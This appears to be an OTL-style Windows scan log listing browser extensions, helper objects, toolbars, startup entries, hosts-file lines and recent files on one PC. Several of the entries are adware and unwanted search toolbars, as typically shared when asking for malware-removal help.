[2013.03.25 22:24:04 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\mozilla firefox\extensions

[2012.11.02 09:07:30 | 000,000,000 | ---D | M] (Skype Click to Call) -- C:\Program Files (x86)\mozilla firefox\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}

[2011.11.15 18:16:24 | 000,000,000 | ---D | M] (Java Console) -- C:\Program Files (x86)\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA}

[2012.05.17 10:20:41 | 000,000,000 | ---D | M] (Java Console) -- C:\Program Files (x86)\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0032-ABCDEFFEDCBA}

[2012.06.14 16:22:28 | 000,000,000 | ---D | M] (Java Console) -- C:\Program Files (x86)\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA}

[2012.10.28 11:39:34 | 000,000,000 | ---D | M] (Java Console) -- C:\Program Files (x86)\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA}

[2011.12.21 03:10:41 | 000,134,104 | ---- | M] (Mozilla Foundation) -- C:\Program Files (x86)\mozilla firefox\components\browsercomps.dll

[2010.03.11 00:01:02 | 000,124,272 | ---- | M] (Citrix Systems, Inc.) -- C:\Program Files (x86)\mozilla firefox\plugins\CCMSDK.dll

[2010.03.11 00:02:52 | 000,070,512 | ---- | M] (Citrix Systems, Inc.) -- C:\Program Files (x86)\mozilla firefox\plugins\CgpCore.dll

[2010.03.11 00:01:48 | 000,091,504 | ---- | M] (Citrix Systems, Inc.) -- C:\Program Files (x86)\mozilla firefox\plugins\confmgr.dll

[2010.03.11 00:01:24 | 000,022,384 | ---- | M] (Citrix Systems, Inc.) -- C:\Program Files (x86)\mozilla firefox\plugins\ctxlogging.dll

[2010.03.11 00:40:56 | 000,423,248 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\plugins\npicaN.dll

[2005.08.27 14:08:06 | 001,398,408 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\plugins\NPSWF32.dll

[2010.03.11 00:02:48 | 000,023,920 | ---- | M] (Citrix Systems, Inc.) -- C:\Program Files (x86)\mozilla firefox\plugins\TcpPServ.dll

[2011.10.21 22:41:37 | 000,001,392 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\amazondotcom-de.xml

[2013.04.26 21:49:01 | 000,006,470 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\babylon.xml

[2011.10.21 22:41:37 | 000,002,252 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\bing.xml

[2011.10.21 22:41:37 | 000,001,153 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\eBay-de.xml

[2011.10.21 22:41:37 | 000,006,805 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\leo_ende_de.xml

[2011.10.21 22:41:37 | 000,001,178 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\wikipedia-de.xml

[2011.10.21 22:41:37 | 000,001,105 | ---- | M] () -- C:\Program Files (x86)\mozilla firefox\searchplugins\yahoo-de.xml

========== Chrome ==========

CHR - default_search_provider: (Enabled)

CHR - default_search_provider: search_url =

CHR - default_search_provider: suggest_url =

CHR - homepage: http://start.mysearc...=1727878116&ir=

CHR - plugin: Error reading preferences file

CHR - Extension: SearchNewTab = C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\afddldeabjlloeiaejhkcihpbfjbcnca\1.0\

CHR - Extension: Delta Toolbar = C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\eooncjejnppfjjklapaamhcdmjbilmde\1.5.1_0\

CHR - Extension: SmartBar Chrome Toolbar = C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\flcjcajklmlbpmgckpcmnampagbhhmcp\1.0_0\

CHR - Extension: IDM Integration = C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmolcgpienlcieaajfkkdamlngancncm\6.16.3_0\

CHR - Extension: DefaultTab = C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc\2.0.7_0\

CHR - Extension: greaTsavear = C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\kfpalkgedhkiepplgnlmmlbjnkoaompj\2.7\

CHR - Extension: savenshAriE = C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\ngohningfjdmdhlhokngnldcgmnkgldf\5.10\

CHR - Extension: Google Wallet = C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\

CHR - Extension: Delta Toolbar = C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\nohfdhapjjlndfgjnmdlcabloeembdkj\1.0_0\

CHR - Extension: MySearchDial = C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\pflphaooapbgpeakohlggbpidpppgdff\9.4.24_0\

O1 HOSTS File: ([2014.04.02 22:36:43 | 000,000,954 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts

O1 - Hosts: 127.0.0.1 activate.adobe.com

O1 - Hosts: 127.0.0.1 practivate.adobe.com

O1 - Hosts: 127.0.0.1 lmlicenses.wip4.adobe.com

O1 - Hosts: 127.0.0.1 lm.licenses.adobe.com

O2:64bit: - BHO: (IDM integration (IDMIEHlprObj Class)) - {0055C089-8582-441B-A0BF-17B458C2A3A8} - C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll (Internet Download Manager, Tonec Inc.)

O2:64bit: - BHO: (Groove GFS Browser Helper) - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Programme\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)

O2:64bit: - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre7\bin\ssv.dll (Oracle Corporation)

O2:64bit: - BHO: (avast! Online Security) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Programme\Alwil Software\Avast5\aswWebRepIE64.dll (AVAST Software)

O2:64bit: - BHO: (Windows Live ID Sign-in Helper) - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Programme\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)

O2:64bit: - BHO: (Google Toolbar Helper) - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)

O2:64bit: - BHO: (Skype add-on for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Skype Technologies S.A.)

O2:64bit: - BHO: (Office Document Cache Handler) - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Programme\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)

O2:64bit: - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Programme\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)

O2 - BHO: (IDM integration (IDMIEHlprObj Class)) - {0055C089-8582-441B-A0BF-17B458C2A3A8} - C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll (Internet Download Manager, Tonec Inc.)

O2 - BHO: (&Yahoo! Toolbar Helper) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn1\yt.dll (Yahoo! Inc.)

O2 - BHO: (VisualBee) - {11111111-1111-1111-1111-110311391106} - C:\Program Files (x86)\VisualBee\VisualBee-bho.dll File not found

O2 - BHO: (PasswordBox Helper) - {5DB69B97-934B-451D-94DB-32EF802A01CD} - C:\Program Files (x86)\PasswordBox\Application\pbbtn.dll (PasswordBox, Inc.)

O2 - BHO: (Groove GFS Browser Helper) - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~2\MICROS~2\Office14\GROOVEEX.DLL (Microsoft Corporation)

O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)

O2 - BHO: (DefaultTab Browser Helper) - {7F6AFBF1-E065-4627-A2FD-810366367D01} - C:\Users\Papa\AppData\Roaming\DefaultTab\DefaultTab\DefaultTabBHO.dll (Search Results LLC.)

O2 - BHO: (avast! Online Security) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Programme\Alwil Software\Avast5\aswWebRepIE.dll (AVAST Software)

O2 - BHO: (Related Searches) - {96A25A24-2E87-4374-8A50-CC6F943FCE4D} - C:\Users\Papa\AppData\Roaming\DefaultTab\DefaultTab\Apps\RelatedLinksBHO.dll (Search Results)

O2 - BHO: (MinibarBHO) - {AA74D58F-ACD0-450D-A85E-6C04B171C044} - C:\Program Files (x86)\Minibar\Minibar.dll (KangoExtensions)

O2 - BHO: (Skype Browser Helper) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)

O2 - BHO: (Office Document Cache Handler) - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\MICROS~2\Office14\URLREDIR.DLL (Microsoft Corporation)

O2 - BHO: (Soearachh-NewTiaabi) - {B92742C8-903F-6740-0B5A-F4F00ABBBCAC} - C:\ProgramData\Soearachh-NewTiaabi\518a8709b4b4e.dll ()

O2 - BHO: (delta Helper Object) - {C1AF5FA5-852C-4C90-812E-A7F75E011D87} - C:\Program Files (x86)\Delta\delta\1.8.21.5\bh\delta.dll (Delta-search.com)

O2 - BHO: (Bing Bar BHO) - {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - C:\Program Files (x86)\MSN Toolbar\Platform\6.3.2291.0\npwinext.dll (Microsoft Corporation)

O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)

O2 - BHO: (mysearchdial Helper Object) - {EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD} - C:\Program Files (x86)\Mysearchdial\1.8.21.0\bh\mysearchdial.dll (MySearchDial)

O2 - BHO: (SmartBar Helper Object) - {FD36FEBE-DBA1-4597-9DD1-B13794B92F68} - C:\Program Files (x86)\Bechiro S.L\smartbar\1.8.8.12\bh\smartbar.dll (Montera Technologeis LTD)

O2 - BHO: (Yontoo) - {FD72061E-9FDE-484D-A58A-0BAB4151CAD8} - C:\Program Files (x86)\Yontoo\YontooIEClient.dll (Yontoo LLC)

O2 - BHO: (SingleInstance Class) - {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} - C:\PROGRA~2\Yahoo!\Companion\Installs\cpn\YTSingleInstance.dll (Yahoo! Inc)

O3:64bit: - HKLM\..\Toolbar: (Google Toolbar) - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)

O3:64bit: - HKLM\..\Toolbar: (no name) - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - No CLSID value found.

O3:64bit: - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.

O3 - HKLM\..\Toolbar: (SmartBar Toolbar) - {0CFBE80D-5608-4309-A0F5-3B1414833432} - C:\Program Files (x86)\Bechiro S.L\smartbar\1.8.8.12\smartbarTlbr.dll (Montera Technologeis LTD)

O3 - HKLM\..\Toolbar: (PasswordBox) - {25E2E5C9-C43C-4EE8-B23E-4383915F2BCE} - C:\Program Files (x86)\PasswordBox\Application\pbbtn.dll (PasswordBox, Inc.)

O3 - HKLM\..\Toolbar: (mysearchdial Toolbar) - {3004627E-F8E9-4E8B-909D-316753CBA923} - C:\Program Files (x86)\Mysearchdial\1.8.21.0\mysearchdialTlbr.dll (MySearchDial)

O3 - HKLM\..\Toolbar: (Delta Toolbar) - {82E1477C-B154-48D3-9891-33D83C26BCD3} - C:\Program Files (x86)\Delta\delta\1.8.21.5\deltaTlbr.dll (Delta-search.com)

O3 - HKLM\..\Toolbar: (@C:\Program Files (x86)\MSN Toolbar\Platform\6.3.2291.0\npwinext.dll,-100) - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\MSN Toolbar\Platform\6.3.2291.0\npwinext.dll (Microsoft Corporation)

O3 - HKLM\..\Toolbar: (Related Searches) - {96A25A24-2E87-4374-8A50-CC6F943FCE4D} - C:\Users\Papa\AppData\Roaming\DefaultTab\DefaultTab\Apps\RelatedLinksBHO.dll (Search Results)

O3 - HKLM\..\Toolbar: (Yahoo! Toolbar) - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn1\yt.dll (Yahoo! Inc.)

O3 - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.

O3:64bit: - HKCU\..\Toolbar\WebBrowser: (Google Toolbar) - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)

O3 - HKCU\..\Toolbar\WebBrowser: (PasswordBox) - {25E2E5C9-C43C-4EE8-B23E-4383915F2BCE} - C:\Program Files (x86)\PasswordBox\Application\pbbtn.dll (PasswordBox, Inc.)

O4:64bit: - HKLM..\Run: [AdobeAAMUpdater-1.0] C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe (Adobe Systems Incorporated)

O4:64bit: - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)

O4:64bit: - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)

O4:64bit: - HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)

O4 - HKLM..\Run: [] File not found

O4 - HKLM..\Run: [AdobeCEPServiceManager] C:\Program Files (x86)\Common Files\Adobe\CEPServiceManager4\CEPServiceManager.exe (Adobe Systems Incorporated)

O4 - HKLM..\Run: [Aeria Ignite] C:\Program Files (x86)\Aeria Games\Ignite\aeriaignite.exe (Aeria Games & Entertainment)

O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)

O4 - HKLM..\Run: [AvastUI.exe] C:\Program Files\Alwil Software\Avast5\AvastUI.exe (AVAST Software)

O4 - HKLM..\Run: [IAStorIcon] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe (Intel Corporation)

O4 - HKLM..\Run: [VNPT-CA CL Token Manager V1_std] C:\Program Files (x86)\VNPT-CA\VNPT-CA CL Token Manager v1\vnpt-ca_cl_v1_certd.exe (VNPT-CA)

O4 - HKLM..\Run: [YouCam Service6] C:\Program Files (x86)\CyberLink\YouCam6\YouCamService6.exe (CyberLink Corp.)

O4 - HKCU..\Run: [BackgroundContainer] "C:\Windows\SysWOW64\Rundll32.exe" "C:\Users\Papa\AppData\Local\Conduit\BackgroundContainer\BackgroundContainer.dll",DllRun File not found

O4 - HKCU..\Run: [HP Photosmart 6510 series (NET)] C:\Program Files\HP\HP Photosmart 6510 series\Bin\ScanToPCActivationApp.exe (Hewlett-Packard Co.)

O4 - HKCU..\Run: [IDMan] C:\Program Files (x86)\Internet Download Manager\IDMan.exe (Tonec Inc.)

O4 - HKCU..\Run: [Tiny download manager] C:\Users\Papa\AppData\Local\DM\TinyDM.exe (http://www.tinydm.com/)

O4:64bit: - HKLM..\RunOnce: [*WerKernelReporting] C:\Windows\SysNative\WerFault.exe (Microsoft Corporation)

O4 - HKCU..\RunOnce: [Avast-Browser-Cleanup] C:\Program Files\Alwil Software\Avast5\BrowserCleanup.exe (AVAST Software)

O4 - Startup: C:\Users\Papa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft SharePoint Workspace.lnk = File not found

O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3

O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145

O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: LogonHoursAction = 2

O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: DontDisplayLogonHoursWarnings = 1

O8:64bit: - Extra context menu item: An OneNote s&enden - C:\Programme\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)

O8:64bit: - Extra context menu item: Bild an &Bluetooth-Gerät senden... - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm ()

O8:64bit: - Extra context menu item: Download all links with IDM - C:\Program Files (x86)\Internet Download Manager\IEGetAll.htm ()

O8:64bit: - Extra context menu item: Download with IDM - C:\Program Files (x86)\Internet Download Manager\IEExt.htm ()

O8:64bit: - Extra context menu item: Free YouTube to MP3 Converter - C:\Users\Papa\AppData\Roaming\DVDVideoSoftIEHelpers\freeyoutubetomp3converter.htm ()

O8:64bit: - Extra context menu item: Google Sidewiki... - res://C:\Program Files (x86)\Google\Google Toolbar\Component\GoogleToolbarDynamic_mui_en_7461B1589E8B4FB7.dll/cmsidewiki.html File not found

O8:64bit: - Extra context menu item: Nach Microsoft E&xcel exportieren - C:\Programme\Microsoft Office\Office14\EXCEL.EXE (Microsoft Corporation)

O8:64bit: - Extra context menu item: Seite an &Bluetooth-Gerät senden... - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie.htm ()

O8 - Extra context menu item: An OneNote s&enden - C:\Programme\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)

O8 - Extra context menu item: Bild an &Bluetooth-Gerät senden... - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm ()

O8 - Extra context menu item: Download all links with IDM - C:\Program Files (x86)\Internet Download Manager\IEGetAll.htm ()

O8 - Extra context menu item: Download with IDM - C:\Program Files (x86)\Internet Download Manager\IEExt.htm ()

O8 - Extra context menu item: Free YouTube to MP3 Converter - C:\Users\Papa\AppData\Roaming\DVDVideoSoftIEHelpers\freeyoutubetomp3converter.htm ()

O8 - Extra context menu item: Google Sidewiki... - res://C:\Program Files (x86)\Google\Google Toolbar\Component\GoogleToolbarDynamic_mui_en_7461B1589E8B4FB7.dll/cmsidewiki.html File not found

O8 - Extra context menu item: Nach Microsoft E&xcel exportieren - C:\Programme\Microsoft Office\Office14\EXCEL.EXE (Microsoft Corporation)

O8 - Extra context menu item: Seite an &Bluetooth-Gerät senden... - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie.htm ()

O9:64bit: - Extra Button: An OneNote senden - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Programme\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)

O9:64bit: - Extra 'Tools' menuitem : An OneNote s&enden - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Programme\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)

O9:64bit: - Extra Button: Verknüpfte &OneNote-Notizen - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Programme\Microsoft Office\Office14\ONBttnIELinkedNotes.dll (Microsoft Corporation)

O9:64bit: - Extra 'Tools' menuitem : Verknüpfte &OneNote-Notizen - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Programme\Microsoft Office\Office14\ONBttnIELinkedNotes.dll (Microsoft Corporation)

O9:64bit: - Extra Button: Skype Click to Call - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Skype Technologies S.A.)

O9:64bit: - Extra Button: @C:\Program Files\WIDCOMM\Bluetooth Software\btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie.htm ()

O9:64bit: - Extra 'Tools' menuitem : @C:\Program Files\WIDCOMM\Bluetooth Software\btrez.dll,-12650 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie.htm ()

O9 - Extra Button: Skype Click to Call - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)

O9 - Extra Button: Search - {AAA38851-3CFF-475F-B5E0-720D3645E4A5} - C:\Program Files (x86)\Minibar\Minibar.dll (KangoExtensions)

O9 - Extra Button: Senden an Bluetooth - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie.htm ()

O9 - Extra 'Tools' menuitem : Senden an &Bluetooth-Gerät... - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie.htm ()

O10:[b]64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000008 [] - C:\Programme\Bonjour\mdnsNSP.dll (Apple Inc.)

O10:[b]64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000009 [] - C:\Programme\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL (Microsoft Corp.)

O10:[b]64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000010 [] - C:\Programme\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL (Microsoft Corp.)

O10 - NameSpace_Catalog5\Catalog_Entries\000000000008 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)

O13[b]64bit: - gopher Prefix: missing

O13 - gopher Prefix: missing

O15 - HKCU\..Trusted Domains: aeriagames.com ([]http in Trusted sites)

O15 - HKCU\..Trusted Domains: aeriagames.com ([]https in Trusted sites)

O15 - HKCU\..Trusted Domains: clonewarsadventures.com ([]* in Trusted sites)

O15 - HKCU\..Trusted Domains: freerealms.com ([]* in Trusted sites)

O15 - HKCU\..Trusted Domains: soe.com ([]* in Trusted sites)

O15 - HKCU\..Trusted Domains: sony.com ([]* in Trusted sites)

O16 - DPF: {4871A87A-BFDD-4106-8153-FFDE2BAC2967} http://dlm.tools.aka...vex-2.2.5.7.cab (DLM Control)

O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.254

O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{17D9B602-7FC4-4529-A557-E1456C40D5AF}: DhcpNameServer = 192.168.1.254

O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{17D9B602-7FC4-4529-A557-E1456C40D5AF}: NameServer = 8.8.8.8,8.8.4.4

O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{309BDE44-686D-41C2-BD31-97E59FC80850}: DhcpNameServer = 192.168.1.254

O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{E104DFEA-8824-4AF6-B1FB-DB2EA7431B75}: DhcpNameServer = 139.7.30.125 139.7.30.126

O18:[b]64bit: - Protocol\Handler\haufereader - No CLSID value found

O18:[b]64bit: - Protocol\Handler\livecall - No CLSID value found

O18:[b]64bit: - Protocol\Handler\ms-help {314111c7-a502-11d2-bbca-00c04f8ec294} - C:\Programme\Common Files\Microsoft Shared\Help\hxds.dll (Microsoft Corporation)

O18:[b]64bit: - Protocol\Handler\msnim - No CLSID value found

O18:[b]64bit: - Protocol\Handler\skype4com - No CLSID value found

O18:[b]64bit: - Protocol\Handler\skype-ie-addon-data {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Skype Technologies S.A.)

O18:[b]64bit: - Protocol\Handler\wlmailhtml - No CLSID value found

O18:[b]64bit: - Protocol\Handler\wlpg - No CLSID value found

O18 - Protocol\Handler\haufereader - No CLSID value found

O18 - Protocol\Handler\ms-help - No CLSID value found

O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL (Skype Technologies)

O18 - Protocol\Handler\skype-ie-addon-data {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll (Skype Technologies S.A.)

O18:[b]64bit: - Protocol\Filter\application/x-ica - No CLSID value found

O18:[b]64bit: - Protocol\Filter\ica - No CLSID value found

O18:[b]64bit: - Protocol\Filter\text/xml {807573E5-5146-11D5-A672-00B0D022E945} - C:\Programme\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL (Microsoft Corporation)

O18 - Protocol\Filter\application/x-ica {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)

O18 - Protocol\Filter\ica {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll (Citrix Systems, Inc.)

O20 - AppInit_DLLs: (c:\progra~3\bitguard\271769~1.27\{c16c1~1\bitguard.dll) - File not found

O20:[b]64bit: - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)

O20:[b]64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)

O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)

O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)

O20:[b]64bit: - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)

O21:[b]64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.

O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.

O28:[b]64bit: - HKLM ShellExecuteHooks: {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Programme\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)

O28 - HKLM ShellExecuteHooks: {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\PROGRA~2\MICROS~2\Office14\GROOVEEX.DLL (Microsoft Corporation)

O32 - HKLM CDRom: AutoRun - 1

O33 - MountPoints2\{bc1d265d-fc35-11e3-b3d0-806e6f6e6963}\Shell - "" = AutoRun

O33 - MountPoints2\{bc1d265d-fc35-11e3-b3d0-806e6f6e6963}\Shell\AutoRun\command - "" = F:\autorun.exe

O33 - MountPoints2\{f83808f1-fc17-11e3-a4b2-60eb69562f4e}\Shell - "" = AutoRun

O33 - MountPoints2\{f83808f1-fc17-11e3-a4b2-60eb69562f4e}\Shell\AutoRun\command - "" = F:\autorun.exe

O33 - MountPoints2\E\Shell - "" = AutoRun

O33 - MountPoints2\E\Shell\AutoRun\command - "" = E:\setup_vmc_lite.exe /checkApplicationPresence

O34 - HKLM BootExecute: (autocheck autochk *)

O35:[b]64bit: - HKLM\..comfile [open] -- "%1" %*

O35:[b]64bit: - HKLM\..exefile [open] -- "%1" %*

O35 - HKLM\..comfile [open] -- "%1" %*

O35 - HKLM\..exefile [open] -- "%1" %*

O37:[b]64bit: - HKLM\...com [@ = comfile] -- "%1" %*

O37:[b]64bit: - HKLM\...exe [@ = exefile] -- "%1" %*

O37 - HKLM\...com [@ = comfile] -- "%1" %*

O37 - HKLM\...exe [@ = exefile] -- "%1" %*

O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)

O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)

O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

========== Files/Folders - Created Within 30 Days ==========

[2014.08.09 22:03:26 | 000,000,000 | ---D | C] -- C:\Users\Papa\Documents\SimCity

[2014.08.09 21:45:15 | 000,000,000 | ---D | C] -- C:\Users\Papa\AppData\Roaming\install

[2014.07.24 02:43:01 | 000,000,000 | ---D | C] -- C:\ProgramData\Vodafone

[2014.07.18 20:11:12 | 000,000,000 | --SD | C] -- C:\Windows\SysNative\CompatTel

[2014.02.16 15:42:08 | 000,290,265 | RHS- | C] (Microsoft) -- C:\Users\Papa\AppData\Roaming\mrsys.exe

[2014.02.16 15:42:04 | 000,290,210 | ---- | C] (Microsoft) -- C:\Users\Papa\AppData\Local\.exe

[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]

========== Files - Modified Within 30 Days ==========

[2014.08.09 23:01:00 | 000,000,254 | ---- | M] () -- C:\Windows\tasks\HP Photo Creations Messager.job

[2014.08.09 22:36:10 | 000,000,986 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job

[2014.08.09 22:34:06 | 000,001,028 | ---- | M] () -- C:\Windows\tasks\CocCocUpdateTaskUserS-1-5-21-4169419405-2626366916-160398126-1007UA.job

